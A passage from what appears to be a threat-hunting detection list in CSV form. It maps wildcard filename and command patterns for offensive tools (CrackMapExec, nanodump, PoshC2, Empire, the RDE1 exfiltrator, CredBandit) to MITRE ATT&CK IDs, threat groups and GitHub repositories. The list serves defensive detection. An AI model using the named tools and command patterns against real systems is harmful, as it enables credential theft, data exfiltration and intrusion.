Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*crack_databases.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*crack_windows.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Crack-allDBs.git*,offensive_tool_keyword,Crack-allDBs,bruteforce script for various DB,T1110 - T1110.002 - T1210,TA0006 - TA0001,N/A,N/A,Exploitation tools,https://github.com/d3ckx1/Crack-allDBs,1,1,N/A,8,1,50,19,2021-04-08T06:17:31Z,2021-04-07T11:17:00Z -*Crack-allDBs-main*,offensive_tool_keyword,Crack-allDBs,bruteforce script for various DB,T1110 - T1110.002 - T1210,TA0006 - TA0001,N/A,N/A,Exploitation tools,https://github.com/d3ckx1/Crack-allDBs,1,1,N/A,8,1,50,19,2021-04-08T06:17:31Z,2021-04-07T11:17:00Z -*crack-allDBs-v1.py*,offensive_tool_keyword,Crack-allDBs,bruteforce script for various DB,T1110 - T1110.002 - T1210,TA0006 - TA0001,N/A,N/A,Exploitation tools,https://github.com/d3ckx1/Crack-allDBs,1,1,N/A,8,1,50,19,2021-04-08T06:17:31Z,2021-04-07T11:17:00Z -*crack-allDBs-v2.py*,offensive_tool_keyword,Crack-allDBs,bruteforce script for various DB,T1110 - T1110.002 - T1210,TA0006 - TA0001,N/A,N/A,Exploitation tools,https://github.com/d3ckx1/Crack-allDBs,1,1,N/A,8,1,50,19,2021-04-08T06:17:31Z,2021-04-07T11:17:00Z -*crackhound.py --verbose --password * --plain-text * --domain * --file * --add-password *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cracklord-master.*,offensive_tool_keyword,cracklord,Queue and resource system for 
cracking passwords,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/jmmcatee/cracklord,1,1,N/A,10,4,377,74,2022-09-22T09:30:14Z,2013-12-09T23:10:54Z -*cracklord-queued*_amd64.deb*,offensive_tool_keyword,cracklord,Queue and resource system for cracking passwords,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/jmmcatee/cracklord,1,1,N/A,10,4,377,74,2022-09-22T09:30:14Z,2013-12-09T23:10:54Z -*cracklord-resourced*_amd64.deb*,offensive_tool_keyword,cracklord,Queue and resource system for cracking passwords,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/jmmcatee/cracklord,1,1,N/A,10,4,377,74,2022-09-22T09:30:14Z,2013-12-09T23:10:54Z -*crackmapexec*,offensive_tool_keyword,crackmapexec,crackmapexec execution name. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*CrackMapExec*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*crackmapexec.exe*,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*crackmapexec.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*crackmapexec.py*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*crackmapexec.spec*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*crackpkcs12*,offensive_tool_keyword,crackpkcs12,A multithreaded program to crack PKCS#12 files (p12 and pfx extensions) by Aestu,T1110 - T1185 - T1114,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/crackpkcs12/crackpkcs12,1,1,N/A,N/A,2,118,26,2019-04-26T18:38:11Z,2015-03-19T22:26:17Z -*crackTGS*,offensive_tool_keyword,ASREPRoast,Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication 
enabled. ,T1558.003,TA0006,N/A,N/A,Credential Access,https://github.com/HarmJ0y/ASREPRoast,1,0,N/A,N/A,2,180,57,2018-09-25T03:26:00Z,2017-01-14T21:07:57Z -*Crassus.csproj*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,1,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -*Crassus.exe*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,1,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -*Crassus.sln*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,0,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -"*crate::modules::{rec2mastodon,rec2virustotal}*",offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*CravateRouge/autobloody*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,1,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*CravateRouge/bloodyAD*,offensive_tool_keyword,bloodyAD,BloodyAD is an Active Directory Privilege Escalation Framework,T1078.004 - T1059.003 - T1071.001,TA0004 - TA0002,N/A,N/A,Privilege 
Escalation,https://github.com/CravateRouge/bloodyAD,1,1,N/A,10,9,883,96,2023-09-01T09:12:45Z,2021-10-11T15:07:26Z -*crawlLdrDllList*,offensive_tool_keyword,cobaltstrike,CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/injectEtwBypass,1,1,N/A,10,10,253,54,2021-09-28T19:09:38Z,2021-09-21T23:06:42Z -*crde dns -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*crde https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - 
TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*crde::utils::checker*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*crde_x64.exe dns -f *,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*crde_x64.exe https -f *,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*CREATE DATABASE C2;*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,0,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*create_dummy_dll_file*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*create_protected_process_as_user*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*create-aws-instance.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*CreateC2Dialog.*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*CreateC2Server*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*createdaisypayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*createlinuxpayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - 
T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Create-MultipleSessions.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Create-NamedPipe*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*createnewpayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*createnewshellcode*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 
framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*createpbindpayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*CreateProcessAsUser*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*createproxypayload -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - 
T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*createproxypayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Create-SuspendedWinLogon*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Create-WinLogonProcess*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*credBandit * output*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/CredBandit,1,0,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*credBandit.*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/CredBandit,1,1,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*credBanditx64*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses 
